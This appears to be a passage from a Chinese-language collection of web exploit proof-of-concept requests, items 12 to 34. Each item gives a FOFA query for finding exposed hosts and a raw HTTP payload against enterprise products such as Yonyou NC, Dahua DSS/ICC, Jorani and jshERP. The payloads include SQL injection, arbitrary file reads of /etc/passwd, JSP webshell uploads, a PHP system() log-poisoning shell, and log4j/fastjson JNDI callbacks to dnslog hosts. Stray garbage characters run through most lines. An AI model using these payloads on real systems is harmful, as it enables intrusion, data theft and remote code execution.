FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"6 |* v! A( `% i; ?4 r4 d6 V# i
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
; G, a& n, P- O- t2 l& L' J0 DHost: 127.0.0.1
; ^: n- w- l) T3 ePragma: no-cache
' f$ {% C7 T: x) kCache-Control: no-cache8 b \; _/ V. u! a3 t' l$ w" {8 K& L
Upgrade-Insecure-Requests: 1
3 o$ m% u/ c) L& rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 t9 O+ ?7 @( C/ N) fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" ^! B" V7 B" h. pAccept-Encoding: gzip, deflate
5 D+ }4 D: I0 p$ T; K% iAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ R7 |; m* J+ w# O8 |Connection: close
: X$ z x9 e3 l& C. Y6 p0 ?/ t* h& ]9 D' [
5 C. V( u% e& C5 _# `" O2 d
12. Jorani < 1.0.2 远程命令执行
$ w6 L- l8 p; TFOFA:title="Jorani"; p. _& `2 Y( t& R& T5 ~
第一步先拿到cookie0 g/ W2 ^/ P" G6 }4 s) V$ X2 w8 }6 e. C
GET /session/login HTTP/1.1
: N' l6 H# W; t2 [0 w) gHost: 192.168.190.30
* {- q+ Q7 P2 Z$ L: t& z# ]7 WUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36: H5 x5 I5 d% C8 C
Connection: close
f( J+ ?1 J6 C4 a6 ?/ I& wAccept-Encoding: gzip
: ?1 V* E+ ?& a3 s5 l, n; Y7 t- u4 ]# U% F
" j/ U! C) R/ x$ e' f3 S7 }
响应中csrf_cookie_jorani用于后续请求
& H1 S. ~7 j' k! [: D0 nHTTP/1.1 200 OK
7 Q. O) F6 h( PConnection: close( S! Z- N0 y7 Z! W/ Z) K0 n1 u
Cache-Control: no-store, no-cache, must-revalidate% W' K" n( E' X- a# _# B
Content-Type: text/html; charset=UTF-8/ D/ r0 ^3 u' D. ?# H8 u0 Q: T
Date: Tue, 24 Oct 2023 09:34:28 GMT
I" Z w) [# O& J5 M1 N& H0 fExpires: Thu, 19 Nov 1981 08:52:00 GMT8 V/ {$ ~! p* u. G3 n
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
% K9 F# X. W( d* B5 s8 \Pragma: no-cache! z& I1 v" x, [0 j7 m3 Z+ N; J
Server: Apache/2.4.54 (Debian)2 J+ w5 _4 |. ]8 e% L4 Q* D3 Z4 j
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
% }# ~) g& H- k |/ T x2 cSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
. i4 c+ D6 c: U2 OVary: Accept-Encoding8 g: X& f5 N/ _
) ` ^% E) ?6 M: v8 h* m( V' p
1 ?7 J/ ^% g& U3 zPOST请求,执行函数并进行base64编码2 m6 v. X6 u# n i3 ]6 e" V
POST /session/login HTTP/1.1& b7 b4 d/ [! ]9 j5 V
Host: 192.168.190.30, \- }, g. v% f, Y! A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
, H) m' O5 P7 v; c k6 c. J0 {Connection: close8 h6 K$ x1 ]) Y' d U7 v
Content-Length: 252
# j- n9 X% W5 F5 ^Content-Type: application/x-www-form-urlencoded5 T" ]+ k, e& D! s
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r9 u0 ]+ F, y# i! I) p& U
Accept-Encoding: gzip B7 D3 h5 [, ~7 F
9 b9 c; L# l7 }5 l. f b1 icsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor4 A) Q' n% ]. t
) o. v7 F, }1 `- Z" Q# E5 g6 Q8 K7 m$ b5 p6 J i* ^
6 p: e# Y" _. m向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
/ K+ q/ [; K( v: e7 Z5 OGET /pages/view/log-2023-10-24 HTTP/1.1# ~+ C" S: U! ] o
Host: 192.168.190.300 T0 }6 r" M {8 k! r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 ?0 G- q4 V% h4 |4 b5 e
Connection: close+ H# Y) m- H# s k! |
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 R; i: J* }: W0 YK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
; f* v& R/ \4 I2 _2 i& ~X-REQUESTED-WITH: XMLHttpRequest6 m0 [, ~& G8 ?1 m; _$ g
Accept-Encoding: gzip3 q& D$ e4 E4 ^
/ o, Y0 d- x' ^ B& `# M1 i
' i. X3 D5 Q5 L! P13. 红帆iOffice ioFileDown任意文件读取. P( p& F0 }2 O
FOFA:app="红帆-ioffice". M. M; ?7 R! U3 ?7 W+ u3 K7 ~
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
5 D6 M* S( q% q- M3 xHost: x.x.x.x
* z- g& N; Q& Q# GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
. P& a( _$ P% gConnection: close g( u! S k4 k, g
Accept: */*! o, g; y; t$ U- U
Accept-Encoding: gzip
$ b5 D! C2 Y W0 [4 g8 T# [ {+ ^/ L$ @1 p
, B- p( H2 K; v0 C
14. 华夏ERP(jshERP)敏感信息泄露) Z) J. y' y; X4 O( t3 N: r+ Q
FOFA:body="jshERP-boot"7 J+ W q) h8 L6 f6 b" w
泄露内容包括用户名密码
8 x3 Z/ s Z; u) x K, MGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
( h/ C V( }2 o" Y$ ^Host: x.x.x.x
7 F3 P3 l; t. `7 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36+ _2 j# x7 _( @
Connection: close, A8 j1 u$ r6 g# s
Accept: */*& f# k' ]! }0 @! X7 Z
Accept-Language: en
4 q. [ Y. q5 o* \6 {% |6 tAccept-Encoding: gzip
3 {0 A( m& e4 Z, I4 \$ Q
6 o' x% V' ?! n: }1 d$ E8 V* Y
. s) P5 O! g) V6 @9 P15. 华夏ERP getAllList信息泄露9 @+ n# W; F( Y, t
CVE-2024-0490$ _; c: f4 c# c9 b% \
FOFA:body="jshERP-boot"
9 F; l% F0 Y: j) j泄露内容包括用户名密码* C6 d) v# e7 C. w
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
3 g# a0 F1 g2 }; K* W+ H3 G" uHost: 192.168.40.130:100
0 c4 _ q; ~9 l$ lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36$ _' E" C2 N* c5 A# p
Connection: close
* Q8 J! I w1 `3 k$ w L7 j; W! fAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
$ W8 t. ^& T& o+ r, }4 [Accept-Language: en7 r9 w/ l; J3 A1 P7 B e
sec-ch-ua-platform: Windows
5 k* l$ o0 ~/ bAccept-Encoding: gzip
- H J' U9 j, l" q+ ]5 F' x' \6 R. S5 ]5 B/ Y. z& {; s9 `
! |" \) j! v3 G- h0 |
16. 红帆HFOffice医微云SQL注入, t/ q: \1 U& [$ C
FOFA:title="HFOffice"" i- ]# D( g+ s1 i/ P
poc中调用函数计算1234的md5值
4 d+ G/ o* L, n+ Y- J' vGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
& w# {5 x/ n& J. Q7 E8 n' qHost: x.x.x.x! Y9 T3 V/ T4 O% K* |
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36' ^ E9 [& m* j) y& H3 ~
Connection: close
; u8 a% w0 D1 Y4 R( f H9 i# bAccept: */*
' A3 b' H- t# ?% U. {" KAccept-Language: en6 F# t# u- X- q& l! l: h
Accept-Encoding: gzip& u ?, s* [& `! C
% v1 }. y( X! [$ s+ @! D0 x9 N. P- [$ [4 X* u6 |( c, P! R5 P
17. 大华 DSS itcBulletin SQL 注入
- _- d; v2 F% A( i; F2 o' Z) l8 vFOFA:app="dahua-DSS"
/ W. r2 N# _6 U/ G% WPOST /portal/services/itcBulletin?wsdl HTTP/1.1 o5 w+ { Z: h4 @8 U4 J6 O6 T
Host: x.x.x.x
, w$ f! b, d8 k( MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% |, I) h- E0 U5 M2 A
Connection: close- V7 ~% A% \8 v
Content-Length: 345
( Q8 T8 o, }- J( s) g% ]Accept-Encoding: gzip" i( R- o, l% |: x
# V" y3 i7 T% D% a }
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>4 L- g! k+ M9 h! s3 {
<s11:Body>2 n/ N/ B2 z! [% b* t
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
; R( R3 ~- n: M I <netMarkings>5 [( f; T2 x) v( p. A, l
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( C) s9 v$ F4 A. T. q/ V </netMarkings>
) }5 t# I! o5 @# U, t </ns1:deleteBulletin>
3 [5 j: `7 r( {( O9 O8 h! k0 u8 i </s11:Body>
/ z: N. h3 ^! H; B# y: E h</s11:Envelope>& b! \) `7 {$ [0 b0 p/ h, o
/ t8 _* ]3 h% E0 U! o& r* l) u
l7 g5 N1 ]' @+ s' I
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露3 }2 }3 c8 X9 r# |: u# f: E, a
FOFA:app="dahua-DSS"0 ^1 W5 I9 s' R* M3 H; [1 r4 Y
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.16 T; k0 Q0 y) L( @7 B! g, {
Host: your-ip
, t' Q* T2 U- R# uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# p$ ~0 I! e/ ~. l% E8 \; S
Accept-Encoding: gzip, deflate
( n/ K$ b) e, R0 dAccept: */*
. e& r& ]5 x2 y) n0 IConnection: keep-alive
# M) Q X, V6 |9 ^& g8 W1 ~
0 P2 i( Y. N2 d+ ^, K5 J8 j1 j3 l Y3 U# F* T
; _' U3 ~) }- ^5 P$ i ?+ C' v- V& U
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入0 ~1 A' o- y. n7 Q
FOFA:app="dahua-DSS"
! o6 j, {1 I+ S* y7 V8 v% |GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
9 ~: [1 j1 f0 {- zHost:
2 `+ k, I6 r' i1 s& e) G0 F8 zUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: G6 z* o' ]2 b- [ \7 a$ u
Accept-Encoding: gzip, deflate
' t6 d' n$ J/ p ]Accept: */*1 J: N Y4 r4 ?6 I! o2 B
Connection: keep-alive
( j+ j" R; e8 h! j& j0 o. R) ^* j5 w9 V. u+ J0 x
% ^1 Y b8 ^6 o K/ z2 c9 w) r
20. 大华ICC智能物联综合管理平台任意文件读取
! U# a& o" \6 }2 c) j9 O4 BFOFA:body="*客户端会小于800*"0 V/ q X0 l; g
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
, R7 _- {! |3 f7 I: ?5 P( OHost: x.x.x.x( w7 N$ O$ W% Z# N% _/ O* u! ^
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) I6 r3 @5 x$ M: AConnection: close
2 Z z9 k/ g0 U2 |5 [* BAccept: */*
8 `: h# h+ F- cAccept-Language: en" V! j* B4 {% }1 w% F. T! r
Accept-Encoding: gzip g, d+ ~' D% V
3 B. \6 d6 B9 r, @
' O8 B$ H1 C5 ]6 | ?/ A2 G
21. 大华ICC智能物联综合管理平台random远程代码执行
7 j6 W! g. G; L2 U G( |$ z3 F" X8 OFOFA:icon_hash="-1935899595"( Q. m1 v/ O( W8 R! ^
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
; I7 @1 s1 Z1 `! h! QHost: x.x.x.x
( ~0 C% @6 O" L8 y7 Z, R1 S4 uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 `! G& q7 Y V5 M! `/ d. ^
Content-Length: 161
% q! y4 v( S( m6 a8 s% O1 EAccept-Encoding: gzip2 ~' [' _9 x9 f9 B |+ Q. r
Connection: close
" l z7 A1 V6 w1 x( A2 AContent-Type: application/json;charset=utf-8
+ L2 g, o. O5 H3 ^2 |3 H# U
$ f/ g$ ]$ F! S( Q" y, `' @3 t{& R8 Q, m- `) i0 i9 G" ]% S
"a":{
5 w" w t7 b6 L6 s' a& \ "@type":"com.alibaba.fastjson.JSONObject",7 }4 U3 c8 P% k0 X" Y: E9 J) V* ?* H
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}: ~+ E. c) z6 ~1 v/ r
}""! |9 H4 E3 U! e, d
}
! u; Z% @% ^: T7 X, v% |: B. S$ v, t o* G. h' e! ^
7 v8 d% ?0 T# ], P8 b, d22. 大华ICC智能物联综合管理平台 log4j远程代码执行( T6 q, K; W! D' e7 C( C6 c! [" s# d
FOFA:icon_hash="-1935899595"8 T7 ]& S Q! k7 H k, N
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
* c" ^7 i' @& l' WHost: your-ip: f6 v) z+ K& D7 l, o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
T% Y5 C7 R3 ~% S$ ~& K* r" NContent-Type: application/json;charset=utf-8$ u0 m4 |, O/ A! q
: y: `, G% I* ]{* p: ^* ?8 W) I
"loginName":"${jndi:ldap://dnslog}"
' R& q9 k ]# _! @- W}3 X) p3 H7 Z% Z/ V# z
/ q6 @. i" v. l: ~& d ^7 y. o
5 w J4 u# B$ ?/ x$ A9 D3 a
/ S* X& E- p: z* I) `23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
* Q" o5 o2 R. A xFOFA:icon_hash="-1935899595"- m- j+ k+ A% }! X9 E/ {) [0 [
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1 p& {: m! I/ m
Host: your-ip
0 r9 A: n3 r! F$ r; OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 z$ d, w) P7 V7 U# k
Content-Type: application/json;charset=utf-8( C0 Z: f) X' v6 G4 A% a2 @. R X
Accept-Encoding: gzip: Z0 j3 `/ Q$ \- G
Connection: close. |* N0 O7 h9 [ v* r' [
: h# ]. A7 y9 U8 ?6 i7 c! F
{
/ J4 n# }& h+ ^2 Z0 p "a":{. d! q- p4 p$ o0 r9 }3 p
"@type":"com.alibaba.fastjson.JSONObject",+ ?, p3 J5 W Z
{"@type":"java.net.URL","val":"http://DNSLOG"}) h: i {$ V; W1 e3 @
}""
& ^* r% M q7 Y4 R( {& \8 V}3 u# Q+ a5 L1 b5 T* z1 B
9 q+ B* v4 n {
9 c5 d+ m6 o+ \! U' d, H# b s
24. 用友NC 6.5 accept.jsp任意文件上传* G: a; w; b6 H4 G h
FOFA:icon_hash="1085941792"# ?5 k2 t* v$ _. I" w
POST /aim/equipmap/accept.jsp HTTP/1.1. B/ |2 b! i5 Q
Host: x.x.x.x
) h1 y$ p+ P+ U1 O$ hUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
6 i: W- M# k$ ^1 N/ qConnection: close2 j; o5 ?5 ]% m& I! W' e% N& a
Content-Length: 4498 ~5 _% T- m8 E0 s8 g. S H
Accept: */*5 H s: }- D7 V6 y7 f+ g
Accept-Encoding: gzip9 E0 P3 z+ j8 D* V/ t9 m# V: J# [
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' _# ^; H" H' n
7 o. e/ V; I3 ~! |) g-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
; ~+ [8 M3 q, _! s& X! q- |1 OContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"5 a. `. D5 l* _
Content-Type: text/plain
% h/ I# t6 Z2 n# {! u0 S& Y+ N
3 c/ C+ q4 V4 t3 [4 r, e8 V<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
5 ^$ b/ \" s0 X-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
) X; D' \8 p; _ Y" b- CContent-Disposition: form-data; name="fname"
- T. \" S6 U" t7 p8 [
. O8 W R! `& F: p. ]\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp" x/ p# J" S9 ~% X: d; [7 i
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--( O9 T! P1 |* H5 O9 |6 P
* w! I/ m# w& e- j2 m
: P$ j1 [1 |0 N S" ?0 Y; Q25. 用友NC registerServlet JNDI 远程代码执行6 I9 t& s. ]" v2 j% s0 K8 z
FOFA:app="用友-UFIDA-NC" ^8 \* m) E. f; s! p9 G
POST /portal/registerServlet HTTP/1.18 I. y4 L3 x& G. S3 n* g& Y
Host: your-ip& S8 V( \, F, J1 t4 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
3 X' ^0 u6 I5 t; @8 A8 R/ WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
; m- y4 H- ^4 [/ V; L5 YAccept-Encoding: gzip, deflate4 @$ p% Q0 I; s- w. H' r
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.66 D6 s" f E& Z$ \) g4 {
Content-Type: application/x-www-form-urlencoded# C- m$ \5 D7 ]: D! V" |
) |( A: T# B1 Z( s9 G* N3 _* h
type=1&dsname=ldap://dnslog9 t3 |) D6 D/ @1 M! a
# F7 U2 f5 W, S# \9 e) N) ]
! F/ H+ ^& h0 z7 s' r& u
2 K' ~- ?/ i/ p2 N26. 用友NC linkVoucher SQL注入
2 t0 Z# t, M. t0 B, {$ I( Q0 K$ LFOFA:app="用友-UFIDA-NC"
% L1 ^6 ^8 r8 `# l9 [# GGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 Y( M- {# C! mHost: your-ip4 D$ Q9 c0 e: J: ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) X/ d6 }9 F3 G O/ dContent-Type: application/x-www-form-urlencoded, F" r& q: A" g5 ^4 W3 `
Accept-Encoding: gzip, deflate
( e% [/ f( {; u6 Z( q/ i# V2 ?: yAccept: */*
. J3 Z! _- d. R, I) K! _9 t4 FConnection: keep-alive
n' V1 B9 X+ Y' L7 N2 _2 q( [$ b: y- U& F5 D
0 S& ?" ?4 t) `1 Z( f" |27. 用友 NC showcontent SQL注入
+ Q8 V( L2 l4 Y1 t( _FOFA:icon_hash="1085941792") M) d4 u7 R1 D8 H6 @
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.11 S, x; q% {7 i, }, j
Host: your-ip
* x/ C+ y1 z( w1 V# j, TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 E9 q2 j0 H$ p a: I) W, SAccept-Encoding: identity
( f: w% d, c) j4 d: tConnection: close
4 ^# S: ?5 `* A% X0 `6 t( y! v; sContent-Type: text/xml; charset=utf-8
& l7 ?5 ], p1 m+ F J$ U" d
& q+ c3 q, |+ M6 U8 I4 U% Z+ y' Q8 P O2 _8 d
28. 用友NC grouptemplet 任意文件上传' @2 n$ E7 P7 u t' f& x8 s3 v
FOFA:icon_hash="1085941792"- k- |" {4 n1 u V. ]+ b7 V
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
, E J% U6 }3 n2 jHost: x.x.x.x
5 s( q( T! B$ u( wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
x5 x; Q# R- t7 W6 C; rConnection: close( N, V! m2 C4 T, @. y1 p5 }
Content-Length: 268
& e. k# f# [" D9 b# N! ?9 b) a+ n; `; CContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
. A3 b5 J$ C' { Y- V0 _Accept-Encoding: gzip; I. L% Z2 W, K* b/ l
, D. w8 V, I) g( Q V------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
8 V6 f% ]7 k* e$ K& a1 oContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
4 y* L" j% V( w" \. P" u+ m/ R" r# AContent-Type: application/octet-stream
+ ~" b3 ~# G4 B2 H7 }2 M. A1 x- S1 N+ p
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>) Z) _6 \, \) v5 T9 [ n
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
" a7 t( j$ r( U+ s% X! ]; j
6 \' w: z! [, c1 d- t; Q& D- w
0 Z$ @+ f! F/ s- q* l" G! w" F6 C/uapim/static/pages/nc/head.jsp3 o$ O: O' g4 t+ g/ C
9 b" w8 U3 x9 T29. 用友NC down/bill SQL注入! d0 B* I& b- x3 E( h! ?
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
`) g h8 x" k: MGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. x3 {* C Q9 K5 J4 y5 _5 V* }, S' wHost: your-ip/ r4 t! b( Q" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 ~5 H8 W# Y( G0 V, {/ ?7 jContent-Type: application/x-www-form-urlencoded
* K! u: A. }+ i* a2 U+ i( o% JAccept-Encoding: gzip, deflate
5 i: l( F' e) Z/ ^( d+ PAccept: */*: J/ k9 `$ N; ~5 o% p
Connection: keep-alive, A2 ~1 f+ G; `$ [3 b3 q: B7 Q/ j
e2 B" d: a* a( @. A
+ V, [+ k3 e2 I4 c* }! W% I' T
30. 用友NC importPml SQL注入
( f% @; r$ y4 B4 M/ S) U% wFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"0 Z3 I( L: f' d
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.18 N1 f# e8 d/ y5 b
Host: your-ip$ H7 X" n8 K, J2 N% O* a& Y5 `; A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
" R4 O7 Z- ^" q' IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
6 Z& B* x9 Y! w) ?2 @Connection: close
& O& l5 U! S! }$ q+ J; s) W6 k0 D4 a. k G
------WebKitFormBoundaryH970hbttBhoCyj9V
5 `5 o2 D' `9 ZContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
* x2 \% _' y$ S7 {1 ZContent-Type: image/jpeg5 D9 W, W% r3 q7 |0 O4 c- Y
------WebKitFormBoundaryH970hbttBhoCyj9V--$ d) h* A1 G9 `4 m
. ^( h8 I% p- I, p8 o5 h+ m" @0 ?: r; u
31. 用友NC runStateServlet SQL注入" Z' m5 P8 i" b: l; a# f
version<=6.5$ H# A7 Q( U8 o% r
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"+ w0 i: q+ V/ v* e! A" x
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.10 e6 r* E2 j" Y! ?8 v
Host: host
& V+ {9 J# \2 |& K0 j/ n* wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ w0 O* E, o+ S; P9 r
Content-Type: application/x-www-form-urlencoded
! r6 D$ c% O `, p, y m0 d1 d- z n$ D i$ a" h
0 K1 E* c1 M5 z) k* p
32. 用友NC complainbilldetail SQL注入; Z: N( C- \) Y+ y" R5 c
version= NC633、NC65
2 ` n) u7 z# o1 O5 u% ^FOFA:app="用友-UFIDA-NC"" z( ~0 c. X5 U/ h
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1( v' g* [6 p- l. o0 r! t# r
Host: your-ip1 X ~1 a- Q* O" u3 w, e! j' S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
V& ?6 @" p" Z) u3 j+ w5 YContent-Type: application/x-www-form-urlencoded
8 R# p6 ?' p/ b& f h5 dAccept-Encoding: gzip, deflate
$ G7 r7 D8 w0 rAccept: */*
1 [9 A8 N o" w% U( j4 b! o: M/ kConnection: keep-alive8 j4 }5 J1 D/ s$ d
T% J! l! d; p' C v3 W1 Y+ e5 e, o$ s! ^! F- A# m# Q
33. 用友NC downTax/download SQL注入4 T" X, Y3 R/ r Z; O, Y" D" F
version:NC6.5FOFA:app="用友-UFIDA-NC"3 L' o" X4 R- g, M: G6 s
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 e1 X! r' Z4 ~+ l' THost: your-ip; m( \2 i; m2 D0 G' l7 C; J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% k1 {1 @* G* |. y, [
Content-Type: application/x-www-form-urlencoded6 ~& \; }, o$ t5 j- N. F1 |
Accept-Encoding: gzip, deflate
" l* K- T5 _0 H( v# w+ G6 O: `Accept: */*
# m4 [% C- h7 i s5 s1 `: M6 XConnection: keep-alive, a! p( r5 W# T* x7 j7 \! j
6 R; P6 c& Q' V" e+ C
, k& n, T; ^' c7 O* j* L9 m6 ~8 m34. 用友NC warningDetailInfo接口SQL注入
, O7 Q" {) y# l# [3 S" qFOFA:app="用友-UFIDA-NC"1 ~- Y1 s* m) f2 L0 G8 \3 T
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1- g4 s" B0 c2 Z3 E2 \2 v; ~4 T
Host: your-ip! b) J& d0 @& U; R. W# L0 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 x V# P( i% p( I8 Q' J
Content-Type: application/x-www-form-urlencoded
, h: c: k1 t) A; i# kAccept-Encoding: gzip, deflate6 h0 N1 m! U+ J. A. e
Accept: */*% O7 `% O/ N7 M/ R7 v
Connection: keep-alive
$ P' F1 M" z, B1 y
2 H8 N# W/ _0 ]5 `
